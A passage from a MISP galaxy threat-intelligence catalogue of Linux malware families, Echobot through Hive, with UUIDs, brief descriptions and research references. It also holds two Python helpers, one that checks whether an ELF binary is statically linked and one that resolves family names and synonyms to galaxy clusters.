- https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf - webarchive
- https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/ - webarchive
- https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ - webarchive
- https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/ - webarchive
- https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy - webarchive
- https://www.welivesecurity.com/en/eset-research/ebury-alive-unseen-400k-linux-servers-compromised-cryptotheft-financial-gain/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf - webarchive
- https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download - webarchive
- https://web-assets.esetstatic.com/wls/en/papers/white-papers/ebury-is-alive-but-unseen.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Echobot
The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.
When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.
https://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities
Internal MISP references
UUID 040ac9c6-e3ab-4b51-88a9-5380101c74f8
which can be used as unique global reference for Echobot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/ - webarchive
- https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada - webarchive
- https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Elevator
Internal MISP references
UUID 6ee05063-4f73-4a99-86a5-906164039a3a
which can be used as unique global reference for Elevator
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EnemyBot
According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.
Internal MISP references
UUID 262d18be-7cab-46c2-bcb0-47fff17604aa
which can be used as unique global reference for EnemyBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot - webarchive
- https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet - webarchive
- https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory - webarchive
- https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers - webarchive
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Erebus (ELF)
Internal MISP references
UUID 479353aa-c6d7-47a7-b5f0-3f97fd904864
which can be used as unique global reference for Erebus (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ESXiArgs
Ransomware used to target ESXi servers.
Internal MISP references
UUID 7550af7f-91cc-49e7-a4c5-d4e4d993cbef
which can be used as unique global reference for ESXiArgs
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.esxi_args - webarchive
- https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/ - webarchive
- https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ - webarchive
- https://www.youtube.com/watch?v=bBcvqxPdjoI - webarchive
- https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Evilginx
According to the author, Evilginx is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
Internal MISP references
UUID 8eee410f-0538-4a6c-897b-c6bf4f9f28d7
which can be used as unique global reference for Evilginx
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilginx - webarchive
- https://osamaellahi.medium.com/the-art-of-defense-evasion-part-3-bypass-multi-factor-authentication-mfa-26d3a87dea0f - webarchive
- https://github.com/kgretzky/evilginx2 - webarchive
- https://www.ironnet.com/blog/robin-banks-still-might-be-robbing-your-bank-part-2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilGnome
According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.
Internal MISP references
UUID 149e693c-4b51-4143-9061-6a8698b0e7f5
which can be used as unique global reference for EvilGnome
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/ - webarchive
- https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EwDoor
Internal MISP references
UUID e75eb723-7c23-4a3b-9419-cefb88e5f6b7
which can be used as unique global reference for EwDoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Exaramel (ELF)
Internal MISP references
UUID 1e0540f3-bad3-403f-b8ed-ce40a276559e
which can be used as unique global reference for Exaramel (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/ - webarchive
- https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf - webarchive
- https://www.wired.com/story/sandworm-centreon-russia-hack/ - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://twitter.com/craiu/status/1361581668092493824 - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ext4
Internal MISP references
UUID 79b2b3c0-6119-4511-9c33-2a48532b6a60
which can be used as unique global reference for ext4
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Facefish
Internal MISP references
UUID 106487ea-a710-4546-bd62-bdbfa0b0447e
which can be used as unique global reference for Facefish
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FBot
Internal MISP references
UUID 501e5434-5796-4d63-8539-d99ec48119c2
which can be used as unique global reference for FBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot - webarchive
- https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html - webarchive
- https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/ - webarchive
- https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/ - webarchive
- https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FinFisher (ELF)
Internal MISP references
UUID 44018d71-25fb-4959-b61e-d7af97c85131
which can be used as unique global reference for FinFisher (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
floodor
Internal MISP references
UUID ac30f2be-8153-4588-b29c-5e5863792930
which can be used as unique global reference for floodor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fodcha
Malware used to run a DDoS botnet.
Internal MISP references
UUID 4a64a1ca-e5bc-4a27-bff2-1c68cea05ba7
which can be used as unique global reference for Fodcha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FontOnLake
This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.
It comes with a rootkit as well.
Internal MISP references
UUID c530d62b-e49f-4ccf-9c87-d9f6c16617b7
which can be used as unique global reference for FontOnLake
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FritzFrog
Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.
Internal MISP references
UUID b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7
which can be used as unique global reference for FritzFrog
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog - webarchive
- https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/ - webarchive
- https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break - webarchive
- https://www.akamai.com/blog/security/fritzfrog-a-new-generation-of-peer-to-peer-botnets - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/ - webarchive
- https://www.akamai.com/blog/security/fritzfrog-p2p - webarchive
- https://www.cyberkendra.com/2024/02/fritzfrog-botnet-expands-attack-arsenal.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gitpaste-12
Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux-based x86 servers, as well as Linux ARM- and MIPS-based IoT devices. It uses GitHub and Pastebin as dead-drop C2 locations.
Internal MISP references
UUID ffd09324-b585-49c0-97e5-536d386f49a5
which can be used as unique global reference for Gitpaste-12
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Glupteba Proxy
ARM32 SOCKS proxy, written in Go, used in the Glupteba campaign.
Internal MISP references
UUID bcfec1d3-ff29-4677-a5f6-be285e98a9db
which can be used as unique global reference for Glupteba Proxy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GobRAT
Internal MISP references
UUID ddba032c-ebde-4736-b7ef-8376702dac6a
which can be used as unique global reference for GobRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Godlua
Internal MISP references
UUID f3cb0a78-1608-44b1-9949-c6addf6c13ce
which can be used as unique global reference for Godlua
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gomir
Internal MISP references
UUID 6fb012ce-c822-471c-9c15-4c7ecfb55528
which can be used as unique global reference for Gomir
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GOSH
Internal MISP references
UUID 931f57f9-1edd-47b8-bf80-ae7190434558
which can be used as unique global reference for GOSH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoTitan
GoTitan is a DDoS bot under development, which supports ten different methods of launching distributed denial-of-service (DDoS) attacks: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.
Internal MISP references
UUID 92007a5e-d408-4c95-b4c2-7b4e4e29559e
which can be used as unique global reference for GoTitan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GreedyAntd
Internal MISP references
UUID 6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3
which can be used as unique global reference for GreedyAntd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gwisin (ELF)
Internal MISP references
UUID c02d252d-95cc-45bc-adb6-bae51b16c55b
which can be used as unique global reference for Gwisin (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HabitsRAT (ELF)
Internal MISP references
UUID e87e7f26-f2a1-437f-8650-312050e3cd48
which can be used as unique global reference for HabitsRAT (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hadooken
Internal MISP references
UUID 84e9e1ec-3676-4d64-9134-c48221c03e38
which can be used as unique global reference for Hadooken
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Haiduc
Internal MISP references
UUID dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a
which can be used as unique global reference for Haiduc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hajime
Internal MISP references
UUID ff8ee85f-4175-4f5a-99e5-0cbc378f1489
which can be used as unique global reference for Hajime
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime - webarchive
- https://x86.re/blog/hajime-a-follow-up/ - webarchive
- https://blog.netlab.360.com/quick-summary-port-8291-scan-en/ - webarchive
- https://github.com/Psychotropos/hajime_hashes - webarchive
- https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461 - webarchive
- https://par.nsf.gov/servlets/purl/10096257 - webarchive
- https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things - webarchive
- https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/ - webarchive
- http://blog.netlab.360.com/hajime-status-report-en/ - webarchive
- https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hakai
Internal MISP references
UUID 0839c28a-ea11-44d4-93d1-24b246ef6743
which can be used as unique global reference for Hakai
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HandyMannyPot
Internal MISP references
UUID 0b323b91-ad57-4127-99d1-6a2485be70df
which can be used as unique global reference for HandyMannyPot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hand of Thief
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hand of Thief.
Known Synonyms |
---|
Hanthie |
Internal MISP references
UUID db3e17f0-677b-4bdb-bc26-25e62a74673d
which can be used as unique global reference for Hand of Thief
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief - webarchive
- https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/ - webarchive
- https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HeadCrab
Internal MISP references
UUID 7bb684d8-ad5c-4d01-91eb-2c600dbcda2a
which can be used as unique global reference for HeadCrab
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HellDown
Ransomware.
Internal MISP references
UUID 6dd0e6e4-536b-4271-a948-39282ff48940
which can be used as unique global reference for HellDown
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HelloBot (ELF)
Internal MISP references
UUID b9fec670-2b1e-4287-ac93-68360d5adcf4
which can be used as unique global reference for HelloBot (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HelloKitty (ELF)
Linux version of the HelloKitty ransomware.
Internal MISP references
UUID 785cadf7-5c99-40bc-b718-8a98d9aa90b7
which can be used as unique global reference for HelloKitty (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group - webarchive
- https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/ - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - webarchive
- https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/ - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
- https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiatusRAT
Lumen discovered this malware in a campaign targeting business-grade routers; the campaign deploys a RAT they call HiatusRAT together with a variant of tcpdump used for traffic interception.
Internal MISP references
UUID 69dcee87-dc61-48d4-a6af-177396bdb850
which can be used as unique global reference for HiatusRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiddenWasp
HiddenWasp is a Linux-based Trojan used to take remote control of targeted systems. It comes in the form of a statically linked ELF binary with libstdc++ built in.
Internal MISP references
UUID ae00d48d-c515-4ca9-a29c-8c53a78f8c73
which can be used as unique global reference for HiddenWasp
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ - webarchive
- https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
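A first triage step for a sample like this is to confirm how it is linked: a statically linked ELF carries no PT_INTERP and no PT_DYNAMIC program header, which is also why such samples give you no dynamic import table to pivot on during analysis. The Python below is an added example, not code from Intezer or from this page. It reads only the ELF header and program header table (no third-party library), reports the interpreter path, whether a dynamic segment exists, and a static/dynamic verdict, and exercises that on constructed in-memory ELF images produced by a small builder in the same block (no real samples are embedded).

```python
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
EM_MIPS, EM_X86_64 = 8, 62


@dataclass(frozen=True)
class ElfLinkage:
    bits: int                 # 32 or 64 (EI_CLASS)
    little_endian: bool       # EI_DATA
    machine: int              # e_machine
    interp: Optional[str]     # PT_INTERP path, None when absent
    has_dynamic: bool         # PT_DYNAMIC present
    static: bool              # no interpreter and no dynamic segment


def _program_headers(data: bytes, bits: int, e: str) -> Iterator[Tuple[int, int, int]]:
    """Yield (p_type, p_offset, p_filesz) straight from the program header table."""
    if bits == 64:
        phoff = struct.unpack_from(e + "Q", data, 32)[0]           # e_phoff
        phentsize, phnum = struct.unpack_from(e + "HH", data, 54)  # e_phentsize, e_phnum
        for i in range(phnum):
            p_type, _flags, p_off, _va, _pa, p_filesz = struct.unpack_from(
                e + "IIQQQQ", data, phoff + i * phentsize)
            yield p_type, p_off, p_filesz
    else:
        phoff = struct.unpack_from(e + "I", data, 28)[0]
        phentsize, phnum = struct.unpack_from(e + "HH", data, 42)
        for i in range(phnum):
            p_type, p_off, _va, _pa, p_filesz = struct.unpack_from(
                e + "IIIII", data, phoff + i * phentsize)
            yield p_type, p_off, p_filesz


def elf_linkage(data: bytes) -> ElfLinkage:
    """Classify an ELF image as statically or dynamically linked from its program headers."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = {1: 32, 2: 64}[data[4]]
    e = {1: "<", 2: ">"}[data[5]]
    machine = struct.unpack_from(e + "H", data, 18)[0]
    interp, has_dynamic = None, False
    for p_type, p_off, p_filesz in _program_headers(data, bits, e):
        if p_type == PT_INTERP:
            raw = data[p_off:p_off + p_filesz].split(b"\x00", 1)[0]
            interp = raw.decode("ascii", "replace")
        elif p_type == PT_DYNAMIC:
            has_dynamic = True
    return ElfLinkage(bits, e == "<", machine, interp, has_dynamic,
                      interp is None and not has_dynamic)


def build_elf(bits: int, little: bool, machine: int,
              segments: List[Tuple[int, int, int]], payload: bytes) -> bytes:
    """Construct a minimal ELF image for testing: header, program headers, payload.
    segments are (p_type, offset_into_payload, size)."""
    e = "<" if little else ">"
    ehsize, phentsize = (64, 56) if bits == 64 else (52, 32)
    base = ehsize + phentsize * len(segments)      # file offset where payload starts
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1 if little else 2, 1]) + b"\x00" * 9
    if bits == 64:
        hdr = struct.pack(e + "16sHHIQQQIHHHHHH", ident, 2, machine, 1, 0, ehsize, 0, 0,
                          ehsize, phentsize, len(segments), 0, 0, 0)
        phdrs = b"".join(struct.pack(e + "IIQQQQQQ", t, 5, base + o, 0, 0, n, n, 1)
                         for t, o, n in segments)
    else:
        hdr = struct.pack(e + "16sHHIIIIIHHHHHH", ident, 2, machine, 1, 0, ehsize, 0, 0,
                          ehsize, phentsize, len(segments), 0, 0, 0)
        phdrs = b"".join(struct.pack(e + "IIIIIIII", t, base + o, 0, 0, n, n, 5, 1)
                         for t, o, n in segments)
    return hdr + phdrs + payload


# Constructed in-memory samples (no real malware embedded).
INTERP = b"/lib64/ld-linux-x86-64.so.2\x00"
DYNAMIC_X64 = build_elf(64, True, EM_X86_64,
                        [(PT_INTERP, 0, len(INTERP)), (PT_DYNAMIC, len(INTERP), 16),
                         (PT_LOAD, 0, 64)],
                        INTERP + b"\x00" * 40)
STATIC_X64 = build_elf(64, True, EM_X86_64, [(PT_LOAD, 0, 16)], b"\x90" * 16)
STATIC_MIPS32_BE = build_elf(32, False, EM_MIPS, [(PT_LOAD, 0, 16)], b"\x00" * 16)

if __name__ == "__main__":
    for name, img in (("dynamic x86-64", DYNAMIC_X64), ("static x86-64", STATIC_X64),
                      ("static MIPS32 BE", STATIC_MIPS32_BE)):
        print(name, elf_linkage(img))
```

On a real file, pass `open(path, "rb").read()` to `elf_linkage`; the verdict matches what `readelf -l` shows, and the big-endian MIPS32 case is included because that is the shape of most router implants in this list.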
Hide and Seek
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hide and Seek.
Known Synonyms |
---|
HNS |
Internal MISP references
UUID 41bf8f3e-bb6a-445d-bb74-d08aae61a94b
which can be used as unique global reference for Hide and Seek
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek - webarchive
- https://blog.avast.com/hide-n-seek-botnet-continues - webarchive
- https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/ - webarchive
- https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/ - webarchive
- https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html - webarchive
- https://threatlabs.avast.com/botnet - webarchive
- https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/ - webarchive
- https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/ - webarchive
- https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/ - webarchive
- https://blog.netlab.360.com/hns-botnet-recent-activities-en/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
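The UUID and the synonyms table are what let other tooling refer to a cluster without depending on its display name, which matters when a feed calls the same family "HNS" and a report calls it "Hide and Seek". The Python below is an added example, not part of the MISP galaxy or Malpedia code. It builds a small cluster list in the shape of the galaxy JSON (values copied from the Hand of Thief, Hide and Seek and Hajime entries on this page), indexes canonical names and synonyms case-insensitively, refuses to resolve a label that two clusters both claim, and produces the MISP tag string; the `misp-galaxy:<type>="<name>"` tag form is assumed here.

```python
import json
from dataclasses import dataclass
from typing import Optional

# Constructed fragment in the shape of a MISP galaxy cluster file; the
# UUIDs, names, synonyms and refs are copied from the entries on this page.
GALAXY_JSON = """
{
  "type": "malpedia",
  "values": [
    {"value": "Hand of Thief",
     "uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d",
     "meta": {"synonyms": ["Hanthie"],
              "refs": ["https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief"]}},
    {"value": "Hide and Seek",
     "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
     "meta": {"synonyms": ["HNS"],
              "refs": ["https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek"]}},
    {"value": "Hajime",
     "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489",
     "meta": {"refs": ["https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime"]}}
  ]
}
"""


@dataclass(frozen=True)
class Cluster:
    name: str
    uuid: str
    synonyms: tuple


class GalaxyIndex:
    """Index galaxy clusters by canonical name and by synonym (case-insensitive)."""

    def __init__(self, galaxy: dict):
        self.type = galaxy["type"]
        self.by_uuid = {}
        self.by_name = {}
        self.ambiguous = set()
        for entry in galaxy["values"]:
            meta = entry.get("meta", {})
            c = Cluster(entry["value"], entry["uuid"], tuple(meta.get("synonyms", [])))
            self.by_uuid[c.uuid] = c
            for label in (c.name,) + c.synonyms:
                key = label.casefold()
                if key in self.by_name and self.by_name[key].uuid != c.uuid:
                    # the same label is claimed by two clusters: never guess
                    self.ambiguous.add(key)
                self.by_name.setdefault(key, c)

    def resolve(self, label: str) -> Optional[Cluster]:
        """Canonical cluster for a name or synonym, or None if unknown/ambiguous."""
        key = label.strip().casefold()
        if key in self.ambiguous:
            return None
        return self.by_name.get(key)

    def tag(self, label: str) -> Optional[str]:
        """MISP tag for the cluster; the misp-galaxy:<type>="<name>" form is assumed."""
        c = self.resolve(label)
        return None if c is None else f'misp-galaxy:{self.type}="{c.name}"'


def load_index(text: str = GALAXY_JSON) -> GalaxyIndex:
    return GalaxyIndex(json.loads(text))


if __name__ == "__main__":
    idx = load_index()
    for label in ("hns", "Hanthie", "Hajime", "Mirai"):
        print(label, "->", idx.resolve(label), idx.tag(label))
```

Resolving through the index rather than string-matching the display name keeps a detection pipeline stable across galaxy updates: the UUID does not change when a synonym is added or a name is re-cased, and an ambiguous label is surfaced as a miss instead of a silent wrong attribution.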
HinataBot
HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.
Internal MISP references
UUID b10fc382-b740-417a-98fa-e23d10223958
which can be used as unique global reference for HinataBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hipid
Internal MISP references
UUID d55eb2f1-e24d-4b50-9839-2e53b5059bae
which can be used as unique global reference for Hipid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hive (ELF)
Internal MISP references
UUID c22452c8-c818-4577-9737-0b87342c7913
which can be used as unique global reference for Hive (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html - webarchive
- https://arxiv.org/pdf/2202.08477.pdf - webarchive
